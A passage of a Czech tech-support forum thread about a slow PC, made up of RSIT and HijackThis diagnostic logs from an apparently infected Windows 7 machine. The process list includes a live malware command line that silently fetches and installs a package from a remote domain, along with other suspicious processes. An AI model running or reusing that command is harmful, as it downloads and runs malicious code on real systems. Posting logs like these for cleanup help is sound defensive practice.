S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2017-04-21 128648]
S2 gupdate;Služba Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-17 153752]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-08-14 335872]
S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2012-01-12 27648]
S3 avastm;Služba %1!s! Update (avastm); C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [2018-06-13 164984]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-17 153752]
S3 gusvc;Google Updater Service; C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe [2015-02-13 136120]
S3 IEEtwCollectorService;@%SystemRoot%\system32\ieetwcollectorres.dll,-1000; C:\Windows\system32\IEEtwCollector.exe [2017-12-29 116224]
S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2018-08-11 194512]
S3 ose;Office Source Engine; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-07-28 89136]
S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 StorSvc;@%SystemRoot%\System32\StorSvc.dll,-100; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 WatAdminSvc;@%SystemRoot%\system32\Wat\WatUX.exe,-601; C:\Windows\system32\Wat\WatAdminSvc.exe [2013-10-30 1255736]
S4 aspnet_state;Stavová služba ASP.NET; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2017-04-21 52856]
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
-----------------EOF-----------------
Re: Zpomalené PC
RSIT log:
Logfile of random's system information tool 1.10 (written by random/random)
Run by Drone at 2018-09-05 16:07:12
Microsoft Windows 7 Professional Service Pack 1
System drive C: has 47 GB (20%) free of 238 GB
Total RAM: 4094 MB (57% free)
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 16:07:24, on 5.9.2018
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.18894)
Boot mode: Normal
Running processes:
C:\Windows\SysWOW64\EhYeIeLWi.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Windows\syswow64\MsiExec.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe
C:\Program Files\trend micro\Drone.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkI ... id=UE12DHP
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: IEExtension.VDownloaderBHO - {7b523e7c-f096-4e36-a0cb-7efeb5c675c1} - mscoree.dll (file missing)
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: aswbIDSAgent - AVAST Software - C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
O23 - Service: Služba %1!s! Update (avast) (avast) - AVAST Software - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
O23 - Service: Avast Antivirus (avast! Antivirus) - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: Služba %1!s! Update (avastm) (avastm) - AVAST Software - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 5910 bytes
======Listing Processes======
\SystemRoot\System32\smss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
wininit.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
winlogon.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
atieclxx
C:\Windows\system32\svchost.exe -k NetworkService
"C:\Program Files\AVAST Software\Avast\AvastSvc.exe"
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
"taskhost.exe"
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
C:\Windows\System32\svchost.exe -k utcsvc
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
"C:\Program Files (x86)\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler.exe"
"C:\Program Files (x86)\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler64.exe"
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
taskeng.exe {9F7464FB-F858-4C01-B903-B02E4632587B}
C:\Windows\SysWOW64\EhYeIeLWi.exe /q /i http://soundal.info/v9b320qcn586.xue
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\SearchIndexer.exe /Embedding
AvastUI.exe /nogui
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
C:\Windows\syswow64\MsiExec.exe -Embedding D9DC1851A781B7F5533C7DD50E245F0E
"C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
"C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM" PriorityLow
"C:\Users\Drone\AppData\Local\Media Network Sharing\msiexec64.exe"
\??\C:\Windows\system32\conhost.exe "-19937277911490919693-933249300-908891384-1566048741-249081015458105671364535199
\??\C:\Windows\system32\conhost.exe "171234901509696851-1045070504-55454072-1365905644312556696407872644-2096392339
"C:\Windows\SysWOW64\resources.bin" "-n" "msiexec64.exe"
C:\Windows\system32\wbem\unsecapp.exe -Embedding
"C:\Windows\SysWOW64\svchost.exe"
"C:\Windows\SysWOW64\svchost.exe" --config="C:\Users\Drone\AppData\Local\Temp\[495E8E]"
\??\C:\Windows\system32\conhost.exe "-91096917611275100337083751712060422261810659854-2085465575-1573627024258217638
"C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe" 0
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Drone\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Drone\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Drone\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fee87c24d0,0x7fee87c24e0,0x7fee87c24f0
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=4092 --on-initialized-event-handle=348 --parent-handle=352 /prefetch:6
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=D9CF77074821AC598E5B376AE36B11EB --mojo-platform-channel-handle=1108 --ignored=" --type=renderer " /prefetch:2
"C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe"
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=93FB6E71E51720C4AFEF2E896CE3333A --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=93FB6E71E51720C4AFEF2E896CE3333A --renderer-client-id=3 --mojo-platform-channel-handle=2160 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=E7BF32E2BCC4F6399669CCB8E54A04CC --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=E7BF32E2BCC4F6399669CCB8E54A04CC --renderer-client-id=4 --mojo-platform-channel-handle=2592 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=960523435D3F887DE832A4404842A18B --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=960523435D3F887DE832A4404842A18B --renderer-client-id=14 --mojo-platform-channel-handle=3420 /prefetch:1
C:\Windows\system32\CompatTelRunner.exe
\??\C:\Windows\system32\conhost.exe "1512110160697033495-800213516-119467602-1064192088154836462811149822782145537507
C:\Windows\system32\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:PxDcTOQ9t0aEou5p.1
taskeng.exe {7912F5E3-0345-4546-8687-238EFA0866D6}
C:\Windows\system32\wbem\wmiprvse.exe
taskeng.exe {C5AD0D9E-7183-4887-A14D-6F6A8D5A8D06}
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=C9E947F72D9B35D51EF245BAC507C30B --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=C9E947F72D9B35D51EF245BAC507C30B --renderer-client-id=35 --mojo-platform-channel-handle=4220 /prefetch:1
C:\Windows\system32\wbem\wmiprvse.exe
"C:\Windows\system32\SearchFilterHost.exe" 0 512 516 524 65536 520
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=E1A56BA9015DD51AE87C7EB2DE2A1EEC --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=E1A56BA9015DD51AE87C7EB2DE2A1EEC --renderer-client-id=36 --mojo-platform-channel-handle=4004 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=E8075E17D62A768FD9A6E2B5DC1ABF7D --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=E8075E17D62A768FD9A6E2B5DC1ABF7D --renderer-client-id=38 --mojo-platform-channel-handle=4060 /prefetch:1
"C:\Users\Drone\Downloads\RSITx64 (1).exe"
=========Mozilla firefox=========
ProfilePath - C:\Users\Drone\AppData\Roaming\Mozilla\Firefox\Profiles\3gv1swpa.default-1479997392283
prefs.js - "browser.search.useDBForOrder" - true
"support@vdownloader.com"=C:\Program Files\VDownloader\Addons\FireFox
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 30.0.0.154 Plugin
"Path"=C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_30_0_0_154.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@google.com/npPicasa3,version=3.0.0]
"Description"=Picasa3 plugin
"Path"=C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.6]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.8]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.0]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]
"Description"=Handles PDFs in-place in Firefox
"Path"=C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 30.0.0.154 Plugin
"Path"=C:\Windows\system32\Macromed\Flash\NPSWF64_30_0_0_154.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/DTPlugin,version=11.172.2]
"Description"=Java™ Deployment Toolkit
"Path"=C:\Program Files\Java\jre1.8.0_172\bin\dtplugin\npDeployJava1.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/JavaPlugin,version=11.172.2]
"Description"=Oracle® Next Generation Java™ Plug-In
"Path"=C:\Program Files\Java\jre1.8.0_172\bin\plugin2\npjp2.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.1.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.1.5]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.0]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.4]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.5.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
C:\Program Files (x86)\Mozilla Firefox\plugins\
nppdf32.dll
C:\Users\Drone\AppData\Roaming\Mozilla\Firefox\Profiles\3gv1swpa.default-1479997392283\extensions\
cs@dictionaries.addons.mozilla.org
======Registry dump======
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre1.8.0_172\bin\ssv.dll [2018-04-25 582088]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2018-05-24 958328]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre1.8.0_172\bin\jp2ssv.dll [2018-04-25 245192]
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7b523e7c-f096-4e36-a0cb-7efeb5c675c1}]
IEExtension.VDownloaderBHO - C:\Windows\system32\mscoree.dll [2010-11-21 444752]
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2018-05-24 820672]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"AvastUI.exe"=C:\Program Files\AVAST Software\Avast\AvLaunch.exe [2018-05-24 242904]
[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"=C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [2013-10-08 766208]
"SunJavaUpdateSched"=C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2018-03-28 588704]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\prwntdrv]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\prwntdrv]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=5
"ConsentPromptBehaviorUser"=3
"EnableUIADesktopToggle"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"SoftwareSASGeneration"=1
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoSimpleNetIDList"=1
"NoDriveTypeAutoRun"=221
"NoDrives"=0
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDrives"=0
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"vidc.uyvy"=msyuv.dll
"vidc.yuy2"=msyuv.dll
"vidc.yvyu"=msyuv.dll
"vidc.iyuv"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"vidc.yvu9"=tsbyuv.dll
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"vidc.mjpg"=bdmjpeg64.dll
"vidc.mpeg"=bdmpegv64.dll
"msacm.bdmpeg"=bdmpega64.acm
"VIDC.FPS1"=frapsv64.dll
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
======File associations======
.js - edit - C:\Windows\System32\Notepad.exe %1
======List of files/folders created in the last 1 month======
2018-09-04 20:51:41 ----A---- C:\Windows\ntbtlog.txt
2018-09-04 20:33:45 ----D---- C:\AdwCleaner
2018-09-04 17:05:14 ----D---- C:\rsit
2018-09-03 14:19:18 ----D---- C:\Windows\{EB47D3E9-14CE-4BE0-B16B-C061571F46C7}
2018-09-02 16:15:31 ----D---- C:\9df5ec6646e5f65a782b5ad04331
2018-09-02 11:10:32 ----D---- C:\Windows\{D32F0790-E651-41F4-9571-6065DA044B85}
2018-09-01 20:53:51 ----D---- C:\Program Files\VS Revo Group
2018-09-01 20:28:40 ----N---- C:\Windows\SYSWOW64\mfc71.dll
2018-08-29 15:10:58 ----D---- C:\Windows\{B58AFBDA-7D5B-40C0-BE79-D9F3286E2165}
2018-08-25 09:52:05 ----D---- C:\Windows\{2E03268B-4782-44EF-B29B-44B65D240959}
2018-08-22 18:51:23 ----D---- C:\Windows\{386B5B3F-9B0C-4C98-A35A-9D30F4B40497}
2018-08-14 21:52:56 ----D---- C:\Windows\{C0DBEF00-2BEB-4F04-B2D3-8007390D5C0B}
2018-08-10 14:47:32 ----D---- C:\Windows\{6CD4963C-603E-45BC-A07A-EB9A6137CC9A}
2018-08-07 13:48:33 ----D---- C:\Windows\{9313CB30-7832-4851-AF74-A21456C4EF2A}
======List of files/folders modified in the last 1 month======
2018-09-05 16:07:19 ----D---- C:\Program Files\trend micro
2018-09-05 16:07:11 ----D---- C:\Windows\Temp
2018-09-05 15:55:06 ----D---- C:\Windows\SysWOW64
2018-09-05 15:53:13 ----SHD---- C:\Windows\Installer
2018-09-05 15:52:57 ----SHD---- C:\Config.Msi
2018-09-04 20:51:41 ----D---- C:\Windows
